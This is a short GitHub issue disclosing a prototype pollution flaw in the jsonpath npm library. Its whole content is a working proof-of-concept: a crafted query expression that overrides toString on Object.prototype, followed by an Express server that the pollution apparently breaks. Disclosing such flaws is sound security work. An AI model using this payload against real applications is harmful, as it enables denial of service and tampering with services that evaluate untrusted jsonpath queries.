Prototype Pollution

Open po6ix opened this issue 5 years ago • 0 comments

poc

var jp = require('jsonpath');
var data = [{}]
var names = jp.query(data, `$..[?( ({})['__proto__']['__defineGetter__']('toString', ({})['constructor']) )]`);

const express = require('express');
const app = express();

app.get('/', (req, res) => {
    res.end('working');
});

app.listen(8080);

Jul 29 '20 04:07 po6ix